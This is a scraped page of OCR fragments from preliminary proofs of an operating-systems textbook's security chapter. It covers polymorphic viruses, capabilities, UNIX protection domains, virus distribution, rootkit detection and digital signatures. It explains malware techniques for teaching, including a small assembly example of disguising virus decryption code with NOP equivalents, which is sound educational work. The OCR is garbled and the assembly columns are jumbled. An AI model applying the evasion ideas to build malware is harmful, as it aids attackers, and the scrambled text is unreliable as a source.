241. ver New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 88 storage in a retrieval system or 4HAsMREiBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise Suppose that the decryption procedure needs to perform the calculation X A B C 4 The straightforward assembly code for this calculation for a generic two address computer is shown in Fig 9 33 a The first address is the source the second is the destination so MOV A R1 moves the variable A to the register R1 The code in Fig 9 33 b does the same thing only less efficiently due to the NOP no opera tion instructions interspersed with the real code MOV A R1 MOV A R1 MOV A R1 MOV A R1 MOV A R1 ADD B R1 NOP ADD 0 R1 OR R1 R1 TST R1 ADD C R1 ADD B R1 ADD B R1 ADD B R1 ADD C R1 SUB 4 R1 NOP OR R1 R1 MOV R1 R5 MOV R1 R5 MOV R1 X ADD C R1 ADD C R1 ADD C R1 ADD B R1 NOP SHL 0 R1 SHL R1 0 CMP R2 R5 SUB 4 R1 SUB 4 R1 SUB 4 R1 SUB 4 R1 NOP JMP 1 ADD R5 R5 JMP 1 MOV R1 X MOV R1 X MOV R1 X MOV R1 X MOV R5 Y MOV R5 Y a b c d e Figure 9 33 Examples of a polymorphic virus But we are not done yet Itis also possible to disguise the decryption code There are many ways to represent NOP For example adding 0 to a register ORing it with itself shifting it left O bits and jumping to the next instruction
242. ver as part of the request The server then extracts the object number to index into its tables to find the object It then computes f Object Rights Check taking the first two parameters from the capability itself and the third one from its own tables If the result agrees with the fourth field in the capability the request is honored otherwise it is rejected If a user tries to access someone else s object he will not be able to fabricate the fourth field correctly since he does not know the check field and the request will be rejected A user can ask the server to produce a weaker capability for example for read only access First the server verifies that the capability is valid If so if com putes f Object New_rights Check and generates a new capability putting this value in the fourth field Note that the original Check value is used because other outstanding capabilities depend on it This new capability is sent back to the requesting process The user can now give this to a friend by just sending it in a message If the friend turns on rights bits that should be off the server will detect this when the capability is used since the f value will not correspond to the false rights field Since the friend does not know the true check field he cannot fabricate a capability that corresponds to the false rights bits This scheme was developed for the Amoeba system Tanenbaum et al 1990 In addition to the specific object dependent ri
243. very instant of time each process runs in some protection domain In other words there is some collection of objects it can access and for each object it has some set of rights Processes can also switch from domain to domain during execution The rules for domain switching are highly system dependent To make the idea of a protection domain more concrete let us look at UNIX including Linux FreeBSD and friends In UNIX the domain of a process is defined by its UID and GID When a user logs in his shell gets the UID and GID contained in his entry in the password file and these are inherited by all its chil dren Given any UID GID combination it is possible to make a complete list of all objects files including I O devices represented by special files etc that can be accessed and whether they can be accessed for reading writing or executing Two processes with the same UID GID combination will have access to exactly the same set of objects Processes with different UID GID values will have access to a different set of files although there may be considerable overlap Furthermore each process in UNIX has two halves the user part and the ker nel part When the process does a system call it switches from the user part to the PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publi
244. written his virus he inserts it into a program on his own machine using a tool called a dropper That infected program is then distributed perhaps by posting it to a free software collection on the Internet The program could be an exciting new game a pirated version of some commercial software or anything else likely to be considered desirable People then begin to download the infected program Once installed on the victim s machine the virus lies dormant until the in fected program is executed Once started it usually begins by infecting other pro grams on the machine and then executing its payload In many cases the payload may do nothing until a certain date has passed to make sure that the virus is widespread before people begin noticing it The date chosen might even send a political message e g if it triggers on the 100th or 500th anniversary of some grave insult to the author s ethnic group In the discussion below we will examine seven kinds of viruses based on what is infected These are companion executable program memory boot sector device driver macro and source code viruses No doubt new types will appear in the future Companion Viruses A companion virus does not actually infect a program but gets to run when the program is supposed to run The concept is easiest to explain with an example In MS DOS when a user types prog MS DOS first looks for a program named prog com If it cannot find one it looks
245. xecute a billion reads of a protected register skew between the local clock and the remote clock does not matter If no hypervisor has been slipped between the hardware and the operating sys tem then the rootkit might be hiding inside the operating system It is difficult to detect it by booting the computer since the operating system cannot be trusted For PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 7 storage in a retrieval system orMflanbrWSAIBAn any form or by any means electronic 1 mechanical photocopying recording or likewise example the rootkit might install a large number of files all of whose names begin with _ and when reading directories on behalf of user programs never report the existence of such files One way to detect rootkits under these cir cumstances is to boot the computer from a trusted external medium such as the original CD ROM DVD or USB stick Then the disk can be scanned by an antirootkit program without fear that the rootkit itself will interfere with the scan Alternatively a cryptographic hash can be made of each file in the operating sys tem and these compared to a list made when the system was installed a
246. y in addition the order of application must not matter that is D and E must be commutative functions Fortunately the RSA algorithm has this property To use this signature scheme the receiver must know the sender s public key Some users publish their public key on their Web page Others do not because they may be afraid of an intruder breaking in and secretly altering their key For them an alternative mechanism is needed to distribute public keys One common method is for message senders to attach a certificate to the message which con tains the user s name and public key and digitally signed by a trusted third party Once the user has acquired the public key of the trusted third party he can accept certificates from all senders who use this trusted third party to generate their certi ficates A trusted third party that signs certificates is called a CA Certification Authority However for a user to verify a certificate signed by a CA the user needs the CA s public key Where does that come from and how does the user know it is the real one To do this in a general way requires a whole scheme for managing public keys called a PKI Public Key Infrastructure For Web browsers the problem is solved in an ad hoc way all browsers come preloaded with the public keys of about 40 popular CAs Above we have described how public key cryptography can be used for digi tal signatures It is worth mentioning that schemes that do not involv
Download Pdf Manuals
Related Search